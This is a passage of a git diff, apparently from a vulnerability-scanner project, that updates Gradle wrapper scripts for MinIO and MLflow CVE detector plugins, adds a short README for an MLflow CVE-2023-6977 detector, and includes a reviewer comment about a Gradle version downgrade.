@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/minio_cve_2023_28432/gradlew b/community/detectors/minio_cve_2023_28432/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/minio_cve_2023_28432/gradlew +++ b/community/detectors/minio_cve_2023_28432/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/minio_cve_2023_28432/gradlew.bat b/community/detectors/minio_cve_2023_28432/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/minio_cve_2023_28432/gradlew.bat +++ b/community/detectors/minio_cve_2023_28432/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/mlflow_cve_2023_1177/README.md b/community/detectors/mlflow_cve_2023_1177/README.md deleted file mode 100644 index 62701d362..000000000 --- a/community/detectors/mlflow_cve_2023_1177/README.md +++ /dev/null @@ -1,17 +0,0 @@ -# MLflow LFI/RFI CVE-2023-1177 Detector - -This detector checks for MLflow LFI/RFI vulnerability (CVE-2023-1177). - -- https://github.com/advisories/GHSA-xg73-94fp-g449 -- https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/ -- https://nvd.nist.gov/vuln/detail/CVE-2023-1177 - -## Build jar file for this plugin - -Using `gradlew`: - -```shell -./gradlew jar -``` - -Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/mlflow_cve_2023_1177/settings.gradle b/community/detectors/mlflow_cve_2023_1177/settings.gradle deleted file mode 100644 index a6838988b..000000000 --- a/community/detectors/mlflow_cve_2023_1177/settings.gradle +++ /dev/null @@ -1 +0,0 @@ -rootProject.name = 'mlflow_cve_2023_1177' 
diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar index e6441136f..d64cd4917 100644 Binary files a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties index b82aa23a4..d04736436 100644 --- a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-8.7-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/mlflow_cve_2023_6014/gradlew.bat b/community/detectors/mlflow_cve_2023_6014/gradlew.bat index 25da30dbd..93e3f59f1 100644 --- a/community/detectors/mlflow_cve_2023_6014/gradlew.bat +++ b/community/detectors/mlflow_cve_2023_6014/gradlew.bat @@ -43,11 +43,11 @@ set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 if %ERRORLEVEL% equ 0 goto execute -echo. 1>&2 -echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 -echo. 1>&2 -echo Please set the JAVA_HOME variable in your environment to match the 1>&2 -echo location of your Java installation. 1>&2 +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. goto fail 
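Review bot: The gradle-wrapper.properties hunk for mlflow_cve_2023_6014 moves `distributionUrl` from `gradle-8.7-bin.zip` to `gradle-7.0-bin.zip`, which is a downgrade, whereas the metabase and minio detectors in this commit go from 6.5 up to 7.0. If the aim is only to make the wrappers uniform, the commit description should say so; otherwise keep `distributionUrl=https\://services.gradle.org/distributions/gradle-8.7-bin.zip` for this detector. The gradlew.bat hunks for the same detector also drop the `1>&2` redirection from the error messages, so they are written to stdout again, which looks like a side effect of regenerating the script from an older wrapper template.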
@@ -57,11 +57,11 @@ set JAVA_EXE=%JAVA_HOME%/bin/java.exe if exist "%JAVA_EXE%" goto execute -echo. 1>&2 -echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 -echo. 1>&2 -echo Please set the JAVA_HOME variable in your environment to match the 1>&2 -echo location of your Java installation. 1>&2 +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. goto fail diff --git a/community/detectors/mlflow_cve_2023_6977/README.md b/community/detectors/mlflow_cve_2023_6977/README.md new file mode 100644 index 000000000..3b1d6db99 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/README.md @@ -0,0 +1,19 @@ +# MLflow LFI/RFI CVE-2023-6977 Detector + +This detector checks for MLflow LFI/RFI vulnerability (CVE-2023-6977). This +vulnerability enables malicious users to read sensitive files on the server. It +encompasses both CVE-2023-1177 and CVE-2023-2780 because exploit of +CVE-2023-6977 bypasses patches of these vulnerabilities by using symlinks. + +- https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf +- https://nvd.nist.gov/vuln/detail/CVE-2023-6977 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/mlflow_cve_2023_1177/build.gradle b/community/detectors/mlflow_cve_2023_6977/build.gradle similarity index 95% rename from community/detectors/mlflow_cve_2023_1177/build.gradle rename to community/detectors/mlflow_cve_2023_6977/build.gradle index e5e582ff7..acace65c6 100644 --- a/community/detectors/mlflow_cve_2023_1177/build.gradle +++ b/community/detectors/mlflow_cve_2023_6977/build.gradle 
@@ -2,9 +2,9 @@ plugins { id 'java-library' } -description = 'Tsunami MLflow LFI/RFI (CVE-2023-1177) VulnDetector plugin.' +description = 'Tsunami MLflow LFI/RFI (CVE-2023-6977) VulnDetector plugin.' group 'com.google.tsunami' -version '0.0.1-SNAPSHOT' +version '0.0.2-SNAPSHOT' repositories { diff --git a/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.jar b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..d64cd4917 Binary files /dev/null and b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.properties b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/mlflow_cve_2023_6977/gradlew b/community/detectors/mlflow_cve_2023_6977/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/gradlew 
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
